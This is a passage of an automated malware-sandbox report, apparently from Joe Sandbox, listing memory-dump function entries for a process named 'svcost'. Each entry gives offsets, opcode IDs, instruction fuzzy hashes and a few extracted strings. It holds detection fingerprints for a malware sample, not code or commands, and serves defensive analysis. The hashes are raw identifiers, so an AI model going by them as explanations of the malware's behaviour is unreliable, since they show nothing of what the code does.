                                                                                            • Instruction Fuzzy Hash: 36E04F34901208EFCB44EFA8C55069CBBF9EB49314F2080A9C80897740D6319A42CB41
                                                                                            Function 023A7130 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 110d183948d97baca4043a4416e2eb31073d80011b888fab70bd23193a7e457e
                                                                                            • Instruction ID: ca58b7632109e25dc4a00ac387849359df8154fe49c28ff466892507d33b0140
                                                                                            • Opcode Fuzzy Hash: 110d183948d97baca4043a4416e2eb31073d80011b888fab70bd23193a7e457e
                                                                                            • Instruction Fuzzy Hash: FBE0E674905208DFC744DFA8D9A565CFBF8EB49205F1491F9C808D3351D7319A42CB41
                                                                                            Function 0211CEB8 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fc078e350e2b88d100dcba8c86719a05c01189efcd9c5350eab4f58504b671c6
                                                                                            • Instruction ID: 323ae23df4b0a586409b6ae2f80b12d4e9b4279e253b4c830ae8f3d6ce5ad229
                                                                                            • Opcode Fuzzy Hash: fc078e350e2b88d100dcba8c86719a05c01189efcd9c5350eab4f58504b671c6
                                                                                            • Instruction Fuzzy Hash: 74E0EC7498634CDFCB44DFA8D9556ADBFB8AB05205F2051B9C809A3250EB305A40CB92
                                                                                            Function 021155D8 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6011353271c27f309432314202a2539a59b5e278bb8fe65e163600da4744b789
                                                                                            • Instruction ID: 37cee424168608ba926f1ba2d9363ec8d89a8b6a4fb8a665d8969546c51e2918
                                                                                            • Opcode Fuzzy Hash: 6011353271c27f309432314202a2539a59b5e278bb8fe65e163600da4744b789
                                                                                            • Instruction Fuzzy Hash: 1EE01274945208EBC708DF94DA5196DBB7AEB86309F5091EDC80917351CB329E42CB82
                                                                                            Function 0541B248 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f9f1a3d86809e6b607702b48efc61f94a9488bf876a4014962b368378c540d08
                                                                                            • Instruction ID: cc3470184564fb34bbb28e8c6642e17e7619421d21a4bc347c3cdbf6da361adc
                                                                                            • Opcode Fuzzy Hash: f9f1a3d86809e6b607702b48efc61f94a9488bf876a4014962b368378c540d08
                                                                                            • Instruction Fuzzy Hash: 82E0127190620C9BDB04EFB59914A9F77A8EB03205F1040F6D50597261DE325A549BE6
                                                                                            Function 0541DEB8 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: efd7e847ab12ba5b9ef2ba9619a274acaedbd8f520b8c46f6d89ae996c373c8f
                                                                                            • Instruction ID: 22e6ebc48cbd319c3ad22756ec431d6abc90f4fcac7c5264845aad7919bca3ad
                                                                                            • Opcode Fuzzy Hash: efd7e847ab12ba5b9ef2ba9619a274acaedbd8f520b8c46f6d89ae996c373c8f
                                                                                            • Instruction Fuzzy Hash: F5E0EC74909608DBC704DF94D9519ADBB79EB46315F1091E9CC0927351CB32AA52CB89
                                                                                            Function 00690868 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 1fb96a14bdad6b2fc1be8856d327c727feb0f771faef845d0cf5bdd75786b035
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: 16E0EC34A05208EBDB08DF94DA519ADBB79EB46305F2091A9CC1867751CB329E42DB81
                                                                                            Function 00692968 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 36b66c70e5febc301193420c61b910d2c5d51b1cda2afdc5fce5b04e9c7a9f60
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: E0E01234905209EBCB04DF95DA61AADFB7DEB46305F2491EDC80817751CB329E46DB81
                                                                                            Function 00693BE8 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 3cf571e712a08d4be40dcdcbe3bb3ba64d8a693e1e4017e99885ba239f759128
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: 40E0EC74909218DBCB04DF94D9519ADBB79EB46305F2091A9C80927751CB32AE42DB85
                                                                                            Function 00698CD0 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4625495ee726b04b84683d42fcaf2d83f504054a275a651c858e6eab1b45fd5e
                                                                                            • Instruction ID: 0b580c2a61164847b7598f6616d554aab110428c533e437a91b87ca34596c51f
                                                                                            • Opcode Fuzzy Hash: 4625495ee726b04b84683d42fcaf2d83f504054a275a651c858e6eab1b45fd5e
                                                                                            • Instruction Fuzzy Hash: 87E0C27080220CEBDB00EFB58910A9E77A8EB02304F1040B6C10593261DE325E048BE2
                                                                                            Function 006934A8 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: c9fb49d2fc05785b7fab7924666536c35decb4a9947190802436a33c3bba0f8f
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: E8E01234905208DBCF04DF94D9519ADBBBDEB46305F2091EDC80817751CB329E46DF81
                                                                                            Function 006974A0 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 9f231495d32b54e692c78c4a064b762f17c8d81d2563a01d198bae0ab4e8d398
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: 8AE01234909208DBCB04DF94E9519ADBFB9EB46305F2091E9C80817751DB32AE42DF91
                                                                                            Function 00697D30 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: eb812f134bc7f8595a357f4ffd8f8982e6175f9e502a4d2329b166a6329c651e
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: CFE01274909208DBCB04DF94D9519BDBB79EF86305F2091E9C80817791DB329E46DB81
                                                                                            Function 00690F40 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 3b7e937c323f9ca4ddd9ffe03d8d707ee6590218d9834edb580aef651b0688d2
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: EDE08C38905208DBCB14DB94E950AACBB79EB46304F20C1A8CC0853740CA329E42DB81
                                                                                            Function 00691F10 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 57508bef4ac592bc385569757f9d004787a31da0be07e90dd42478256ffc13c6
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: 55E0C23490520CDBCB04DF94E9509ACBBB9EB46304F2091E8C80817740CB329E43CB81
                                                                                            Function 023AFF68 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1b5b0cae13efb505f176445bab195afc9eed22d5a80d795ab6a431c10d6bc56
                                                                                            • Instruction ID: 3fb8ff2e57dc6232200b72e729d3a8f8d0edcbd8dd7d5ff514bf890d31b3875b
                                                                                            • Opcode Fuzzy Hash: e1b5b0cae13efb505f176445bab195afc9eed22d5a80d795ab6a431c10d6bc56
                                                                                            • Instruction Fuzzy Hash: AAE01234905308EBC704DF94DA6196DBB79EB4A319F1491EDD80817751CB32AE52CBC1
                                                                                            Function 023A5D38 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5232242e328bcca84034d51d50d64b9422bce2df7cc9fa1d05ab1e30d9246998
                                                                                            • Instruction ID: 3f64b30a1a0f2ad07fb4842325b1d288833a48836d75b3241f114ea69b2c6002
                                                                                            • Opcode Fuzzy Hash: 5232242e328bcca84034d51d50d64b9422bce2df7cc9fa1d05ab1e30d9246998
                                                                                            • Instruction Fuzzy Hash: DBE0EC74D4520CEFCB44EFB8D96969DBBB8EB0520AF5051B9C808A3660EB315A84CB41
                                                                                            Function 023A9340 Relevance: .0, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a83f96c19313f74bee7d19c9a189e3384704af538253723492d635c40cda07a
                                                                                            • Instruction ID: 087518312b445214af20e6f7ce1889ad38b269cfcbb6cf0923d9f381bc3e47cb
                                                                                            • Opcode Fuzzy Hash: 9a83f96c19313f74bee7d19c9a189e3384704af538253723492d635c40cda07a
                                                                                            • Instruction Fuzzy Hash: FCE0C271A0030CEBCB00DFB4EC5566DB7B9EB84200F5085A8E4089B244DA711F119784
                                                                                            Function 023A6038 Relevance: .0, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c2f08ce0612dea361e39c761f91a826827dc2b68c355d769b841d9c46356d9b5
                                                                                            • Instruction ID: 195cff1ecd33f349a30e0dad5db948f826a33a8087862b3958e6ad4ad3f1cfe1
                                                                                            • Opcode Fuzzy Hash: c2f08ce0612dea361e39c761f91a826827dc2b68c355d769b841d9c46356d9b5
                                                                                            • Instruction Fuzzy Hash: 3ED05B7490A20CDBCB04DFA4D936A6DBB7CEB46305F1091B8D40823650C7311981DF55
                                                                                            Function 023A92F8 Relevance: .0, Instructions: 17COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 673da476bdb1ceae40fc4950f9640442b619bacf244c76aa96d5c84427f4e1db
                                                                                            • Instruction ID: f7f930a84e811143bd6f745f67d08bf837a59c8a627e8540ed8644f164c86816
                                                                                            • Opcode Fuzzy Hash: 673da476bdb1ceae40fc4950f9640442b619bacf244c76aa96d5c84427f4e1db
                                                                                            • Instruction Fuzzy Hash: 33E01271A0020CEFCB40DFE5E54165DB7F9DB45311F5085A9D808D7345DA315F019795
                                                                                            Function 023A0E8B Relevance: .0, Instructions: 13COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d9b4c49547b441e5921eec09c5983540425313e97fd3a7f7a5fb7cf236b60a73
                                                                                            • Instruction ID: af33b0668bc40f471918aae4929b45a57f8684133e96521b15642e13264c2ff1
                                                                                            • Opcode Fuzzy Hash: d9b4c49547b441e5921eec09c5983540425313e97fd3a7f7a5fb7cf236b60a73
                                                                                            • Instruction Fuzzy Hash: EFD017B8A102188BCB04EFA4D8587AD77F5AB55301F1005A9C0096B728CB719981CF40
                                                                                            Function 0541E320 Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7380e38ff939aa8aef433055fe65cf96080878002fb045da9b46614f13c41027
                                                                                            • Instruction ID: 0269e46fc8e4473da4482b11321ef6b517e8c4240eb800b3dc93bafa2d1bfe80
                                                                                            • Opcode Fuzzy Hash: 7380e38ff939aa8aef433055fe65cf96080878002fb045da9b46614f13c41027
                                                                                            • Instruction Fuzzy Hash: 56C04C7804B70987D2145755AA38FBA7A9C970720AF406565DD0D015724B715061CA5A
                                                                                            Function 0211F530 Relevance: .0, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73689916103ec9dbdbd8af5b75880ab51799687673637d4e96271ffcee71cb35
                                                                                            • Instruction ID: 5dfaaed5358cac651b803404d54a8decf6f6847eb5ac4e3ee365372481b3929f
                                                                                            • Opcode Fuzzy Hash: 73689916103ec9dbdbd8af5b75880ab51799687673637d4e96271ffcee71cb35
                                                                                            • Instruction Fuzzy Hash: ECB092480AD3820FC6839A3028225846FF81CA208938983E39A5482457640A153F9722
                                                                                            Function 002FC878 Relevance: .0, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73e6a246e7583d20ae778ab52b4595b5980e5ce68fa85750bfb6a53e3949c9ba
                                                                                            • Instruction ID: 55fe16fab9c364f89a14911a4242aee7f7ecac2a3390537efbcf9dd6b4203c7e
                                                                                            • Opcode Fuzzy Hash: 73e6a246e7583d20ae778ab52b4595b5980e5ce68fa85750bfb6a53e3949c9ba
                                                                                            • Instruction Fuzzy Hash: ACC08CB00027088BD2093BE5BE2DB3DBA68AF4234FF001038E10C008718F319450CB6B
                                                                                            Function 023AABB1 Relevance: .0, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f3a0bc1edd6b91681fc185dd51b677f84d8ddad7e714f68230e8e4d303486aa4
                                                                                            • Instruction ID: 668fb8f47f9990d81231a2c4ff2387d70ee0868ba220df78274f47074ec736c3
                                                                                            • Opcode Fuzzy Hash: f3a0bc1edd6b91681fc185dd51b677f84d8ddad7e714f68230e8e4d303486aa4
                                                                                            • Instruction Fuzzy Hash: B0C08C2008F3C06FCB438B302C6AB443F301703300F4882C7A5808A4E784860085C306
                                                                                            Function 023A0D05 Relevance: .0, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4ad9efe7a4c5cb6d6ca36bd77dd79cda69ac9f3331caeb65bf6b56175182668f
                                                                                            • Instruction ID: 1ffc3725d484ce16a8c518eec52aa6628d3ab9b7e2e92814a14ac17c7ab2a2b5
                                                                                            • Opcode Fuzzy Hash: 4ad9efe7a4c5cb6d6ca36bd77dd79cda69ac9f3331caeb65bf6b56175182668f
                                                                                            • Instruction Fuzzy Hash: 3AD092B49142198BDB64EF50CC547E9B7F9AB44302F0045B9941D6F655C7B06B46CF40
                                                                                            Function 0211D432 Relevance: .0, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 104dae35396f3c42c26732e76e465865373b06dd8801913f30efaa27f030a026
                                                                                            • Instruction ID: a13515b9b5a43fbd606254e126dcbac7d0bb12f018c62a20a308b9676c9494f2
                                                                                            • Opcode Fuzzy Hash: 104dae35396f3c42c26732e76e465865373b06dd8801913f30efaa27f030a026
                                                                                            • Instruction Fuzzy Hash: 52C00276E501199A8F00DAD9E4518DCB774EB94321B004026E614A6104D6302526CB54

                                                                                            Non-executed Functions

                                                                                            Function 021179E8 Relevance: 6.3, Strings: 5, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: S$X$c$cC$cV
                                                                                            • API String ID: 0-97544332
                                                                                            • Opcode ID: 0b7fb96a24163427dabda046f4aef29b9d430bd67f24983d7988f55621aea4c4
                                                                                            • Instruction ID: e7bdf4ebec7dbfc636578c1fbc2c6a8fdb5da91e3861c4ee6ffc06674b795e15
                                                                                            • Opcode Fuzzy Hash: 0b7fb96a24163427dabda046f4aef29b9d430bd67f24983d7988f55621aea4c4
                                                                                            • Instruction Fuzzy Hash: 9E314670988259CFDB549F24C8887EDB7B5EB06314F1190FAD419AA290CB714E85CF59
                                                                                            Function 0069AC6B Relevance: 5.1, Strings: 4, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: +$,$D$cV
                                                                                            • API String ID: 0-1405599392
                                                                                            • Opcode ID: 26f5b9579ed95b813d2acb0884a3d96f8949ade9aa67fe7f9d09555c7d3cfca5
                                                                                            • Instruction ID: 6aa2d620d0ed2dbc0c228841b20784b3f051496d3df29a15011469e6f2f45da5
                                                                                            • Opcode Fuzzy Hash: 26f5b9579ed95b813d2acb0884a3d96f8949ade9aa67fe7f9d09555c7d3cfca5
                                                                                            • Instruction Fuzzy Hash: CE21CC74901269CFDB60DF98D988B9CB7F6EB49314F5080EAD509BB651CB319E81CF44
                                                                                            Function 0069A714 Relevance: 5.1, Strings: 4, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: +$,$D$cV
                                                                                            • API String ID: 0-1405599392
                                                                                            • Opcode ID: 1ea91f7fca0202b0848f7c108b8b373a7308dc8337967d7bc410463afea213bd
                                                                                            • Instruction ID: f808f27833e4fbbee954834884c4773258198513c5e176ad6b77df091639af2b
                                                                                            • Opcode Fuzzy Hash: 1ea91f7fca0202b0848f7c108b8b373a7308dc8337967d7bc410463afea213bd
                                                                                            • Instruction Fuzzy Hash: DF21D9749012A8CFCB60DF98D988BD8B7F6EB49314F0080AAD409AB681C7359E85CF45
                                                                                            Function 0069B56A Relevance: 5.1, Strings: 4, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: )$+$2$cV
                                                                                            • API String ID: 0-3765604281
                                                                                            • Opcode ID: d528cb536e9dd0afdf806992c1f963a1f5fbe9213dd00ea1463a67510933d8e0
                                                                                            • Instruction ID: 71bcbf2fc38396a64f9e9b121457d7863b15c312dbaf507b3b9ae4dabcc71f07
                                                                                            • Opcode Fuzzy Hash: d528cb536e9dd0afdf806992c1f963a1f5fbe9213dd00ea1463a67510933d8e0
                                                                                            • Instruction Fuzzy Hash: 8721CC74901268CFDB60DFA8C988BDCB7F6EB49314F5081AAD40ABB690C7345E85CF01
                                                                                            Function 02117D84 Relevance: 5.0, Strings: 4, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
